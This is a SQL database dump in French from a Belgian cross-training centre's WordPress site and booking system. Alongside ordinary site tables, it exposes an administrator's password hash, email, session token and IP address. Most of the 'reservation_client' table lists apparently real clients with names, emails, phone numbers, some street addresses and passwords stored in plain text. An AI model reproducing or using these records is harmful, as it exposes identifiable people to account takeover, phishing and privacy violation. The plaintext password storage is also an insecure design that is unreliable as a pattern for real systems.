(1, 1, '2018-09-02 15:27:07', '2018-09-02 13:27:07', 'Bienvenue sur WordPress. Ceci est votre premier article. Modifiez-le ou supprimez-le, puis lancez-vous !', 'Bonjour tout le monde !', '', 'publish', 'open', 'open', '', 'bonjour-tout-le-monde', '', '', '2018-09-02 15:27:07', '2018-09-02 13:27:07', '', 0, 'http://dev.crosstrainingcenter.be/?p=1', 0, 'post', '', 1),
(2, 1, '2018-09-02 15:27:07', '2018-09-02 13:27:07', 'Voici un exemple de page. Elle est différente d’un article de blog, en cela qu’elle restera à la même place, et s’affichera dans le menu de navigation de votre site (en fonction de votre thème). La plupart des gens commencent par écrire une page « À Propos » qui les présente aux visiteurs potentiels du site. Vous pourriez y écrire quelque chose de ce tenant :\n\n<blockquote>Bonjour ! Je suis un mécanicien qui aspire à devenir un acteur, et ceci est mon blog. J’habite à Bordeaux, j’ai un super chien qui s’appelle Russell, et j’aime la vodka-ananas (ainsi que perdre mon temps à regarder la pluie tomber).</blockquote>\n\n...ou bien quelque chose comme cela :\n\n<blockquote>La société 123 Machin Truc a été créée en 1971, et n’a cessé de proposer au public des machins-trucs de qualité depuis cette année. Située à Saint-Remy-en-Bouzemont-Saint-Genest-et-Isson, 123 Machin Truc emploie 2 000 personnes, et fabrique toutes sortes de bidules super pour la communauté bouzemontoise.</blockquote>\n\nÉtant donné que vous êtes un nouvel utilisateur ou une nouvelle utilisatrice de WordPress, vous devriez vous rendre sur votre <a href=\"http://dev.crosstrainingcenter.be/wp-admin/\">tableau de bord</a> pour effacer la présente page, et créer de nouvelles pages avec votre propre contenu. Amusez-vous bien !', 'Page d’exemple', '', 'publish', 'closed', 'open', '', 'page-d-exemple', '', '', '2018-09-02 15:27:07', '2018-09-02 13:27:07', '', 0, 'http://dev.crosstrainingcenter.be/?page_id=2', 0, 'page', '', 0),
(3, 1, '2018-09-02 15:27:21', '0000-00-00 00:00:00', '', 'Brouillon auto', '', 'auto-draft', 'open', 'open', '', '', '', '', '2018-09-02 15:27:21', '0000-00-00 00:00:00', '', 0, 'http://dev.crosstrainingcenter.be/?p=3', 0, 'post', '', 0),
(4, 1, '2018-09-02 15:36:43', '2018-09-02 13:36:43', 'Bienvenue sur votre site ! C’est votre page d’accueil que vos visiteurs verront lorsqu’ils arriveront sur votre site la première fois.', 'Accueil', '', 'publish', 'closed', 'closed', '', 'accueil', '', '', '2018-09-02 15:36:43', '2018-09-02 13:36:43', '', 0, 'http://dev.crosstrainingcenter.be/?page_id=4', 0, 'page', '', 0),
(5, 1, '2018-09-02 15:36:43', '2018-09-02 13:36:43', '', 'Blog', '', 'publish', 'closed', 'closed', '', 'blog', '', '', '2018-09-02 15:36:43', '2018-09-02 13:36:43', '', 0, 'http://dev.crosstrainingcenter.be/?page_id=5', 0, 'page', '', 0),
(7, 1, '2018-09-02 15:36:43', '2018-09-02 13:36:43', 'Bienvenue sur votre site ! C’est votre page d’accueil que vos visiteurs verront lorsqu’ils arriveront sur votre site la première fois.', 'Accueil', '', 'inherit', 'closed', 'closed', '', '4-revision-v1', '', '', '2018-09-02 15:36:43', '2018-09-02 13:36:43', '', 4, 'http://dev.crosstrainingcenter.be/2018/09/02/4-revision-v1/', 0, 'revision', '', 0),
(8, 1, '2018-09-02 15:36:43', '2018-09-02 13:36:43', '', 'Blog', '', 'inherit', 'closed', 'closed', '', '5-revision-v1', '', '', '2018-09-02 15:36:43', '2018-09-02 13:36:43', '', 5, 'http://dev.crosstrainingcenter.be/2018/09/02/5-revision-v1/', 0, 'revision', '', 0),
(9, 1, '2018-09-02 15:36:44', '2018-09-02 13:36:44', ' ', '', '', 'publish', 'closed', 'closed', '', '9', '', '', '2018-09-02 15:36:44', '2018-09-02 13:36:44', '', 0, 'http://dev.crosstrainingcenter.be/2018/09/02/9/', 0, 'nav_menu_item', '', 0),
(10, 1, '2018-09-02 15:36:44', '2018-09-02 13:36:44', ' ', '', '', 'publish', 'closed', 'closed', '', '10', '', '', '2018-09-02 15:36:44', '2018-09-02 13:36:44', '', 0, 'http://dev.crosstrainingcenter.be/2018/09/02/10/', 1, 'nav_menu_item', '', 0),
(18, 1, '2018-09-02 15:56:27', '2018-09-02 13:56:27', '', 'dp', '', 'inherit', 'open', 'closed', '', 'dp', '', '', '2018-09-02 15:56:27', '2018-09-02 13:56:27', '', 0, 'http://dev.crosstrainingcenter.be/wp-content/uploads/2018/09/dp.png', 0, 'attachment', 'image/png', 0),
(19, 1, '2018-09-02 15:57:34', '0000-00-00 00:00:00', '{\"widget_zerif_team-widget[1]\":{\"value\":{\"encoded_serialized_instance\":\"YToxMjp7czo0OiJuYW1lIjtzOjE1OiJEYW1pZW4gUGllcnJhcmQiO3M6ODoicG9zaXRpb24iO3M6NDg6IkFkbWluaXN0cmF0ZXVyIGFzYmwgLSBDb2FjaCBDcm9zcyBUcmFpbmluZyBOYW11ciI7czoxMToiZGVzY3JpcHRpb24iO3M6MDoiIjtzOjc6ImZiX2xpbmsiO3M6MDoiIjtzOjc6InR3X2xpbmsiO3M6MDoiIjtzOjc6ImJoX2xpbmsiO3M6MDoiIjtzOjc6ImRiX2xpbmsiO3M6MDoiIjtzOjc6ImxuX2xpbmsiO3M6MDoiIjtzOjk6ImltYWdlX3VyaSI7czo3NToiaHR0cDovL2Rldi5jcm9zc3RyYWluaW5nY2VudGVyLmJlL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDE4LzA5L2RwLTI5OHgzMDAucG5nIjtzOjE1OiJvcGVuX25ld193aW5kb3ciO3M6MDoiIjtzOjE1OiJjdXN0b21fbWVkaWFfaWQiO3M6MjoiMTgiO3M6MTk6ImltYWdlX2luX2N1c3RvbWl6ZXIiO3M6NzU6Imh0dHA6Ly9kZXYuY3Jvc3N0cmFpbmluZ2NlbnRlci5iZS93cC1jb250ZW50L3VwbG9hZHMvMjAxOC8wOS9kcC0xNTB4MTUwLnBuZyI7fQ==\",\"title\":\"\",\"is_widget_customizer_js_value\":true,\"instance_hash_key\":\"34e9f19475f84cfe9a8d811426402ff4\"},\"type\":\"option\",\"user_id\":1,\"date_modified_gmt\":\"2018-09-02 13:56:34\"},\"widget_zerif_team-widget[2]\":{\"value\":{\"encoded_serialized_instance\":\"YToxMjp7czo0OiJuYW1lIjtzOjE2OiJKdWxpZW4gTGFsbGVtYW50IjtzOjg6InBvc2l0aW9uIjtzOjI2OiJDb2FjaCBDcm9zcyBUcmFpbmluZyBOYW11ciI7czoxMToiZGVzY3JpcHRpb24iO3M6MDoiIjtzOjc6ImZiX2xpbmsiO3M6MDoiIjtzOjc6InR3X2xpbmsiO3M6MDoiIjtzOjc6ImJoX2xpbmsiO3M6MDoiIjtzOjc6ImRiX2xpbmsiO3M6MDoiIjtzOjc6ImxuX2xpbmsiO3M6MDoiIjtzOjk6ImltYWdlX3VyaSI7czo3NToiaHR0cDovL2Rldi5jcm9zc3RyYWluaW5nY2VudGVyLmJlL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDE4LzA5L2psLTMwMHgzMDAucG5nIjtzOjE1OiJvcGVuX25ld193aW5kb3ciO3M6MDoiIjtzOjE1OiJjdXN0b21fbWVkaWFfaWQiO3M6MjoiMjAiO3M6MTk6ImltYWdlX2luX2N1c3RvbWl6ZXIiO3M6NzU6Imh0dHA6Ly9kZXYuY3Jvc3N0cmFpbmluZ2NlbnRlci5iZS93cC1jb250ZW50L3VwbG9hZHMvMjAxOC8wOS9qbC0xNTB4MTUwLnBuZyI7fQ==\",\"title\":\"\",\"is_widget_customizer_js_value\":true,\"instance_hash_key\":\"9999302bfc1272df0c5e814861414025\"},\"type\":\"option\",\"user_id\":1,\"date_modified_gmt\":\"2018-09-02 13:57:34\"},\"widget_zerif_team-widget[3]\":{\"value\":{\"encoded_serialized_instance\":\"YToxMjp7czo0OiJuYW1lIjtzOjEyOiJIb25uYXkgTWFyaWUiO3M6ODoicG9zaXRpb24iO3M6NDY6IiBDb2FjaCBDcm9zcyBUcmFpbmluZyBOYW11ciBldCBEaWV0w6l0aWNpZW5uZSAiO3M6MTE6ImRlc2NyaXB0aW9uIjtzOjA6IiI7czo3OiJmYl9saW5rIjtzOjA6IiI7czo3OiJ0d19saW5rIjtzOjA6IiI7czo3OiJiaF9saW5rIjtzOjA6IiI7czo3OiJkYl9saW5rIjtzOjA6IiI7czo3OiJsbl9saW5rIjtzOjA6IiI7czo5OiJpbWFnZV91cmkiO3M6NzU6Imh0dHA6Ly9kZXYuY3Jvc3N0cmFpbmluZ2NlbnRlci5iZS93cC1jb250ZW50L3VwbG9hZHMvMjAxOC8wOS9taC0yOTh4MzAwLnBuZyI7czoxNToib3Blbl9uZXdfd2luZG93IjtzOjA6IiI7czoxNToiY3VzdG9tX21lZGlhX2lkIjtzOjI6IjIxIjtzOjE5OiJpbWFnZV9pbl9jdXN0b21pemVyIjtzOjc1OiJodHRwOi8vZGV2LmNyb3NzdHJhaW5pbmdjZW50ZXIuYmUvd3AtY29udGVudC91cGxvYWRzLzIwMTgvMDkvbWgtMTUweDE1MC5wbmciO30=\",\"title\":\"\",\"is_widget_customizer_js_value\":true,\"instance_hash_key\":\"d82886b9e1e288f1187f5a30c9e88c62\"},\"type\":\"option\",\"user_id\":1,\"date_modified_gmt\":\"2018-09-02 13:57:34\"}}', '', '', 'auto-draft', 'closed', 'closed', '', 'ae7eacf9-1eff-44dc-b023-a5c7976b1388', '', '', '2018-09-02 15:57:34', '2018-09-02 13:57:34', '', 0, 'http://dev.crosstrainingcenter.be/?p=19', 0, 'customize_changeset', '', 0),
(20, 1, '2018-09-02 15:56:43', '2018-09-02 13:56:43', '', 'jl', '', 'inherit', 'open', 'closed', '', 'jl', '', '', '2018-09-02 15:56:43', '2018-09-02 13:56:43', '', 0, 'http://dev.crosstrainingcenter.be/wp-content/uploads/2018/09/jl.png', 0, 'attachment', 'image/png', 0),
(21, 1, '2018-09-02 15:56:56', '2018-09-02 13:56:56', '', 'mh', '', 'inherit', 'open', 'closed', '', 'mh', '', '', '2018-09-02 15:56:56', '2018-09-02 13:56:56', '', 0, 'http://dev.crosstrainingcenter.be/wp-content/uploads/2018/09/mh.png', 0, 'attachment', 'image/png', 0);

-- --------------------------------------------------------

--
-- Structure de la table `ct_termmeta`
--

CREATE TABLE `ct_termmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `term_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `ct_terms`
--

CREATE TABLE `ct_terms` (
  `term_id` bigint(20) UNSIGNED NOT NULL,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `ct_terms`
--

INSERT INTO `ct_terms` (`term_id`, `name`, `slug`, `term_group`) VALUES
(1, 'Non classé', 'non-classe', 0),
(2, 'Primary Menu', 'primary-menu', 0);

-- --------------------------------------------------------

--
-- Structure de la table `ct_term_relationships`
--

CREATE TABLE `ct_term_relationships` (
  `object_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `ct_term_relationships`
--

INSERT INTO `ct_term_relationships` (`object_id`, `term_taxonomy_id`, `term_order`) VALUES
(1, 1, 0),
(9, 2, 0),
(10, 2, 0);

-- --------------------------------------------------------

--
-- Structure de la table `ct_term_taxonomy`
--

CREATE TABLE `ct_term_taxonomy` (
  `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL,
  `term_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `ct_term_taxonomy`
--

INSERT INTO `ct_term_taxonomy` (`term_taxonomy_id`, `term_id`, `taxonomy`, `description`, `parent`, `count`) VALUES
(1, 1, 'category', '', 0, 1),
(2, 2, 'nav_menu', '', 0, 2);

-- --------------------------------------------------------

--
-- Structure de la table `ct_usermeta`
--

CREATE TABLE `ct_usermeta` (
  `umeta_id` bigint(20) UNSIGNED NOT NULL,
  `user_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `ct_usermeta`
--

INSERT INTO `ct_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(1, 1, 'nickname', 'ctnadmin'),
(2, 1, 'first_name', ''),
(3, 1, 'last_name', ''),
(4, 1, 'description', ''),
(5, 1, 'rich_editing', 'true'),
(6, 1, 'syntax_highlighting', 'true'),
(7, 1, 'comment_shortcuts', 'false'),
(8, 1, 'admin_color', 'fresh'),
(9, 1, 'use_ssl', '0'),
(10, 1, 'show_admin_bar_front', 'true'),
(11, 1, 'locale', ''),
(12, 1, 'ct_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'),
(13, 1, 'ct_user_level', '10'),
(14, 1, 'dismissed_wp_pointers', ''),
(15, 1, 'show_welcome_panel', '1'),
(16, 1, 'session_tokens', 'a:1:{s:64:\"cd49284e3a9027ef2350a28f3a8d1c51a184ea26a71ab415e8066a09e80403fc\";a:4:{s:10:\"expiration\";i:1546344269;s:2:\"ip\";s:14:\"62.235.238.101\";s:2:\"ua\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:5:\"login\";i:1546171469;}}'),
(17, 1, 'ct_dashboard_quick_press_last_post_id', '3'),
(18, 1, 'community-events-location', 'a:1:{s:2:\"ip\";s:12:\"62.235.238.0\";}');

-- --------------------------------------------------------

--
-- Structure de la table `ct_users`
--

CREATE TABLE `ct_users` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `ct_users`
--

INSERT INTO `ct_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
(1, 'ctnadmin', '$P$B1d7ZCc.aqs82aLEkUn1SaLkSFpWRM/', 'ctnadmin', 'stv@otvr.net', '', '2018-09-02 13:27:07', '', 0, 'ctnadmin');

-- --------------------------------------------------------

--
-- Structure de la table `reservation_client`
--

CREATE TABLE `reservation_client` (
  `id` int(11) NOT NULL,
  `nom` varchar(250) NOT NULL,
  `prenom` varchar(250) NOT NULL,
  `email` varchar(250) NOT NULL,
  `mdp` varchar(250) NOT NULL,
  `gsm` varchar(250) NOT NULL,
  `adr` varchar(250) NOT NULL,
  `cp` int(6) NOT NULL,
  `ville` varchar(250) NOT NULL,
  `pays` varchar(2) NOT NULL,
  `nb_seance` int(11) NOT NULL DEFAULT '0',
  `validite_seance` date NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `reservation_client`
--

INSERT INTO `reservation_client` (`id`, `nom`, `prenom`, `email`, `mdp`, `gsm`, `adr`, `cp`, `ville`, `pays`, `nb_seance`, `validite_seance`) VALUES
(3, 'Pierrard', 'Damien', 'dpierrard@gmail.com', 'charlotte1200', '0478934006', 'Rue de Bauw 25', 5020, 'Malonne', '', 20, '2020-07-01'),
(230, 'Derwa', 'Christelle', 'chderwa@gmail.com', 'cqgpe9', '0473/53 63 58', 'rue du sart helman', 5380, 'Franc Waret', '', 16, '2020-12-01'),
(299, 'Moubarik', 'Badr', 'bm.assur@portima.be', 'dqsftq', '', '', 0, '', '', 3, '2018-07-01'),
(300, 'Jacques', 'Maxence', 'maxencejcqs@gmail.com', '55vz5d', '', '', 0, '', '', 7, '2019-07-01'),
(380, 'Baufays', 'Maxence', 'maxencebaufays@hotmail.fr', '62zm66', '0475/63.07.52', '', 0, '', '', 5, '2020-01-01'),
(363, 'Schietecat', 'Nicolas ', 'nicolas.schietecat@hotmail.com', '849xfk', '', '', 0, '', '', 14, '2019-09-01'),
(224, 'Pallen', 'Myriam', 'myriam.pallen@gmail.com', '5wvtmu', '0496/38 00 44', '', 5080, 'Rhisnes', '', 0, '2017-11-01'),
(267, 'Donato', 'Michael ', 'donatom@mandat.belfius.be ', 'xz68ecd4ds564c684qsx684', '0477/22 57 82', '', 0, '', '', 7, '2019-01-01'),
(268, 'Moreau', 'Jean-Baptiste', 'fq@fdsf', 'xz68ecd4ds564c684qsx684', '0477/38 77 41', '', 0, '', '', 2, '2019-01-01'),
(269, 'Ripet', 'Sophie', 'sophie.ripet@gmail.com', 'zttfwh', '0498/ 56 40 27', '', 0, '', '', 0, '2018-07-01'),
(292, 'Cabossart', 'Virginie', 'cabosart.v@live.be', 'VirginieEmma2015', '0476/74.52.18', '', 0, '', '', 16, '2019-09-01'),
(231, 'Palin', 'Isabelle ', 'isabellepalin@hotmail.com', 'Lenaelia5', '0499/26 82 09', '', 0, 'Franière', '', 13, '2020-07-01'),
(232, 'Collignon', 'Brieuc', 'brieuc.collignon@gmail.com', 'boun4567', '0474/64 21 49', 'Chaussée de Nivelles 346', 5020, 'Temploux', '', 0, '2016-08-01'),
(346, 'André', 'Maxime', 'alain.andre04@gmail.com', 'xz68ecd4ds564c684qsx684', '0496/12 65 53', '', 0, '', '', 0, '2019-01-01'),
(370, 'Mahaux', 'Alyson', 'globalys@gmail.com', 'kzaqzz', '', '', 0, '', '', 0, '2020-01-01'),
(372, 'Houbard', 'Elise', 'e.houbart@live.be', 'ap5nf4', '', '', 0, '', '', 0, '2020-01-01'),
(26, 'Piret', 'Gauthier', 'gauthier.piret@hotmail.com', 'dmdfhx', '0498/ 34 13 57', '', 0, '', '', 0, '2017-11-14'),
(349, 'Beguin', 'Clément', 'fqfq@fsds', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2018-07-01'),
(316, 'Lipset', 'Pascaline', 'pascaline.lispet@gmail.com', 'rg644a', '0477/71 97 96', '', 0, '', '', 1, '2020-01-01'),
(31, 'Delchevalerie', 'Thierry', 'shin-gi-tai@hotmail.com', '2133jtnc58', '+32473997910', '', 0, '', '', 26, '2020-01-01'),
(340, 'Strepenne', 'Adèle ', 'fqfq@fdsfs', 'xz68ecd4ds564c684qsx684', '0483/07 49 09', '', 0, '', '', 0, '2018-07-01'),
(333, 'Jadot', 'Nicolas ', 'nicolasjadot1903@gmail.com', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2018-01-01'),
(336, 'Lambert', 'Charlotte', 'charlotte-lambert@live.be', 'xz68ecd4ds564c684qsx684', '0474/63 63 75', '', 0, '', '', 0, '2018-07-01'),
(35, 'Tillieux', 'Eric', 'eric.tillieux@fintro.be', '42kc8p', '0478/537.757', '', 5190, 'Spy', '', 0, '2018-06-01'),
(37, 'Peeters', 'Laetitia', 'peeters.laetitia@gmail.com', 'e4yz2m', '', '', 0, '', '', 0, '2016-06-01'),
(339, 'Delvaux', 'Cédric ', 'cdelvaux@hotmail.com', 'xfrskx', '0478/38 89 01', '', 0, '', '', 3, '2019-12-30'),
(381, 'Ancion', 'Caroline ', 'info@institut-profildange.be', 'xa23v7', '0489/27.37.86', '', 0, '', '', 9, '2020-01-01'),
(334, 'Balon', 'Émilien ', 'balonemilien1994@gmail.com', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2018-07-01'),
(356, 'Sana', 'Xavier Charles', 'latelierdxc@gmail.com', '4undd7', '0471/574762', '', 0, '', '', 7, '2019-07-01'),
(329, 'Mohrhardt', 'Vanessa', 'trama@outlook.be', 'uzbc2e', '0486/46 49 54', '', 0, '', '', 1, '2019-01-01'),
(255, 'Motch', 'Simon', 'simtreize@gmail.com', 'simon013', '0496/33 66 31', '', 5380, 'Fernelmont', '', 1, '2019-12-01'),
(338, 'Cantraine', 'Nicolas ', 'cantraine.nicolas@skynet.be', 'p2xyyz', '', '', 0, '', '', 0, '2020-01-01'),
(48, 'Delchevalerie', 'Noémie ', 'delchevalerienoemie@hotmail.com', 'MEuhoui', '0499467513', '', 0, '', '', 4, '2019-01-01'),
(47, 'Poels', 'Arnaud', 'poelsarnaud@hotmail.com', 'muscu', '0478 / 504785', '', 0, '', '', 0, '2015-11-25'),
(368, 'Graulus', 'Lorys', 'fsffs@fsds', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2019-06-01'),
(282, 'Absil', 'Manon', 'absil.manon@gmail.com', 'hjragr', '', '', 0, '', '', 9, '2019-01-01'),
(379, 'Baufays', 'Frederic ', 'fredericbaufays@hotmail.com', 'mahu33', '0474/35.90.58', '', 0, '', '', 3, '2020-01-01'),
(54, 'Sbaa', 'Nadir', 'nadirsbaa@hotmail.com', 'asg7a4', '', '', 0, '', '', 0, '2018-07-01'),
(56, 'Dahin', 'Mary', 'mary.dahin@solidaris.be', 'gjbz5s', '0494130388', '', 0, '', '', 1, '2019-03-01'),
(362, 'Van Camp', 'Caroline ', 'caroline.vancamp.92@gmail.com', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2019-01-01'),
(60, 'Migali', 'Gabriela', 'gabriela.migali@live.be', 'xz68ecd4ds564c684qsx684', '0495/ 47 82 78', '', 0, '', '', 0, '2020-01-01'),
(272, 'Dave', 'Camille', 'davecamille@hotmail.com', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2019-01-01'),
(273, 'Dreize', 'François', 'françoisdreize@hotmail.com', 'xz68ecd4ds564c684qsx684', '0496/13 74 61', '', 0, '', '', 0, '2019-01-01'),
(373, 'Lombardo ', 'Mattéo', 'matteo.lombardo@outlook.be', 'a5r2kg', '0483/058819', '', 0, '', '', 0, '2020-01-01'),
(275, 'Dricot', 'Vannie', 'dricot.v@hotmail.fr', 'gu9y7x', '', '', 0, '', '', 0, '2018-01-01'),
(276, 'Hayette', 'Sara', 'shanasara@live.be', '3nmqpj', '0498/ 70 23 84', '', 0, '', '', 0, '2018-01-01'),
(228, 'Derwa', 'Corinne', 'corinne_derwa@hotmail.com', '4ufkam', '0472/45 37 85', '', 5101, 'Loyers', '', 0, '2017-03-01'),
(330, 'Lombardo', 'Alessia ', 'Aert@rty', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2018-07-01'),
(259, 'Houart', 'Nicolas', 'nicohouart@gmail.com', 'mx39s4', '', '', 0, '', '', 0, '2017-06-01'),
(260, 'Marchal', 'Jeff', 'marchal_jef@hotmail.com', '4k7wvx', '0478210206', 'Rue de L\'Eau Vive, 43', 5020, 'Vedrin', '', 15, '2019-07-01'),
(261, 'Lallemant', 'Julien', 'lallemant.j@hotmail.com', 'zj6v2p', '', '', 0, '', '', 0, '2018-01-01'),
(218, 'Dubray', 'Benjamin', 'benito.baero@gmail.com', '3tcdf6', '0498/ 18 56 76', '', 5100, 'Jambes', '', 3, '2019-01-01'),
(328, 'Lombardo', 'Lola', 'lolalombardo2602@gmail.com', 'xz68ecd4ds564c684qsx684', '0485/95 73 11', '', 0, '', '', 0, '2018-07-01'),
(103, 'Fontaine', 'Vianel', 'vianel.fontaine@gmail.com', 'ThVia198', '0472399538', '', 0, '', '', 3, '2019-07-01'),
(80, 'Essai nouveau membre', '', 'Es', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2017-11-01'),
(140, 'Medard', 'Cédric ', 'cedric.medard@hotmail.fr', '6j9y7t', '0475309147', 'rue Bertrand Janquin, 19', 5100, 'JAMBES', '', 9, '2019-07-01'),
(313, 'Devroye', 'Andy ', 'devroyeandy@yahoo.fr', 'xz68ecd4ds564c684qsx684', '0494/84 42 64', '', 0, '', '', 8, '2019-01-01'),
(314, 'Sacré', 'Sébastien ', 'sebasacre1987@gmail.com', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2019-07-01'),
(138, 'Demolder', 'Florence ', 'fdemolder@gmail.com', 'maison', '0474/44 43 13', '', 0, 'fdemolder@gmail.com', '', 2, '2020-09-26'),
(327, 'Labeau', 'Jonathan', 'cwcw@fdsf', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2018-01-01'),
(281, 'Currao', 'Jessica', 'jessica.currao@hotmail.com', 'zzzjma', '0473/72 46 72', '', 0, '', '', 0, '2019-01-01'),
(90, 'Delooz', 'Audric', 'fred.delooz@gmail.com', 'sc8p85', '0471/ 55 25 50', '', 0, 'fred.delooz@gmail.com', '', 0, '2018-07-12'),
(92, 'Berlemont', 'Isabelle ', 'isabelleberlemont@mac.com', 'croquette', '0477/43 80 24', 'Fonds des Chênes 211', 5100, 'Wépion', '', 4, '2020-01-01'),
(283, 'Gillet', 'Florent', 'florent1919@hotmail.be', '9yxcma', '0486/98 14 20', '', 0, 'Promotion', '', 0, '2017-07-12'),
(280, 'Demolder', 'Laura', 'laura.demolder@hotmail.com', 'Laumon0105', '0476399203', '211 Fonds des Chênes', 0, '', '', 6, '2019-01-01'),
(309, 'Liegeois', 'Odile', 'odile.liegeois22@gmail.com', 'dinette22', '0477/67 86 48', '', 0, '', '', 0, '2018-07-01'),
(348, 'Demoulin', 'Olivier', 'olivierdemoulin@skynet.be', '3k88bq', '', '', 0, '8€', '', -37, '2018-07-01'),
(347, 'Massart', 'Serge', 'serge.massart@fermalux.be', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2018-07-01'),
(308, 'Perez', 'Laura', 'laura.perez-castellano@hotmail.com', 'mcwh58', '0474/39 71 12', '', 0, '', '', 0, '2018-07-01'),
(378, 'COLOT', 'Agnès', 'agnescolot@gmail.com', 'phbc4y', '0498/300.277', '', 0, '', '', 0, '2020-01-01'),
(320, 'Bajrami', 'Albin', 'albin.bajrami@outlook.com', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2018-07-01'),
(322, 'Avril', 'Claire', 'avril.claire@skynet.be', '8bhsap', '', '', 0, '', '', 0, '2018-07-01'),
(105, 'Piret', 'Veronique', 'veronique.leblanc.piret@skynet.be', '6nm8gh', '0477940770', '', 0, '', '', 6, '2018-12-01'),
(325, 'Nestergal', 'Laura', 'laura.nestergal@hotmail.be', 'xz68ecd4ds564c684qsx684', '0499/42 7569', '', 0, '', '', 0, '2018-07-01'),
(326, 'Henquin', 'Bruno', 'fsfs@fdsfs', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2018-07-01'),
(301, 'Joannes', 'Gaetan', 'joannes.gaetan@hotmail.com', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2018-07-01'),
(366, 'Gauthier', 'Sophie', 'fdsfaf@fss', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 17, '2019-07-01'),
(367, 'Robinet', 'Marine', 'marine.robinet@outlook.com', 'Marine01', '0474549525', '', 0, '', '', 2, '2020-07-01'),
(278, 'De Backer', 'Fabian ', 'dbfabian@gmail.com', '3bvcm6', '0476/ 25 46 45', '', 0, 'Spontin', '', 1, '2018-07-01'),
(126, 'Pingaut', 'Basile', 'vincent.marqueverte@gmail.com', 'xz68ecd4ds564c684qsx684', '+32474118213', '', 0, '', '', 4, '2019-01-01'),
(295, 'TEST', 'TEST', 'test@otvr.net', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2018-04-20'),
(296, 'Rosmolen', 'Fred', 'Fhj@gjk', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2018-01-01'),
(297, 'Dell Aquila', 'Nunziata', 'Dell beau@me.be', '8555z3', '', '', 0, '', '', 0, '2018-04-10'),
(290, 'Gaziaux', 'Vincent', 'vincgaz@hotmail.com', 'gaziaux', '0474/742827', '', 5590, '', '', 0, '2018-01-01'),
(294, 'Mengeot', 'Florence', 'mengeot.florence@gmail.com', 'flocrossT', '0498/85 01 13', '', 5000, 'Namur', '', 6, '2019-09-01'),
(180, 'Van Ende', 'Charlotte', 'cvanende@gmail.com', 'xz68ecd4ds564c684qsx684', '0484940999', 'Rue Henri Lecoq 63', 5000, 'Namur', '', 0, '2018-12-01'),
(196, 'Van Den Driessche', 'Gilles', 'gillesvdd@hotmail.com', 'xz68ecd4ds564c684qsx684', '0478/913988', '', 0, '', '', 0, '2017-07-01'),
(377, 'ZARRO', 'Lionel ', 'zarrolio@hotmail.com', '23d9qv', '0488/441.474', '', 0, '', '', 0, '2020-01-01'),
(195, 'Goossens', 'Marie', 'goossensmarie11@hotmail.com', 'bonifacio', '0495 38 82 77', '', 0, '', '', 0, '2019-01-01'),
(335, 'Hebette', 'Arnaud', 'arnaud.hebette17@outlook.com', 'xz68ecd4ds564c684qsx684', '', '', 0, '', '', 0, '2018-07-01'),
